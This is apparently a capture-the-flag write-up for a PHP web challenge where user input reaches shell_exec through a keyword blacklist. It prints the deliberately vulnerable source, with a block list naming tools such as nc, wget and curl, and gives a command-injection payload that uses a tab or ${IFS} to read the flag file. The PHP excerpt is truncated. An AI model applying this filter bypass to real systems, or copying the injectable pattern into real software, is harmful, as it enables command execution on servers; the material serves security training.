Bing2 (web)

This challenge uses shell_exec with our input, however there are many input commands that are being escaped.

Source code:


if (isset($_POST['Submit'])) {
	$target = trim($_REQUEST['ip']);

	$substitutions = array(
		' ' => '',
		'&'  => '',
		'&&' => '',
		'('  => '',
		')'  => '',
		'-'  => '',
		'`'  => '',
		'|' => '',
		'||' => '',
		'; ' => '',	
		'%' => '',
		'~' => '',
		'<' => '',
		'>' => '',
		'/ ' => '',
		'\\' => '',
		'ls' => '',
        'cat' => '',
        'less' => '',
        'tail' => '',
        'more' => '',
        'whoami' => '',
        'pwd' => '',
        'busybox' => '',
        'nc' => '',
        'exec' => '',
        'sh' => '',
        'bash' => '',
        'php' => '',
        'perl' => '',
        'python' => '',
        'ruby' => '',
        'java' => '',
        'javac' => '',
        'gcc' => '',
        'g++' => '',
        'make' => '',
        'cmake' => '',
        'nmap' => '',
        'wget' => '',
        'curl' => '',
        'scp' => '',
        'ssh' => '',
        'ftp' => '',
        'telnet' => '',
        'dig' => '',
        'nslookup' => '',
        'iptables' => '',
        'chmod' => '',
        'chown' => '',
        'chgrp' => '',
        'kill' => '',
        'killall' => '',
        'service' => '',
        'systemctl' => '',
        'sudo' => '',
        'su' => '',
        'flag' => '',

	$target = str_replace(array_keys($substitutions), $substitutions, $target);
    echo $target;
    echo "\n";
    echo "\\";
	if (stristr(php_uname('s'), 'Windows NT')) {
		$cmd = shell_exec('ping  ' . $target);
	} else {
        echo "else is else\n";
		$cmd = shell_exec('ping  -c 4 ' . (string)$target);
        echo $cmd;

The solution is not difficult, spaces are escaped, but tabs are not, ${IFS} could also be used.


; head /fla?.txt

Last updated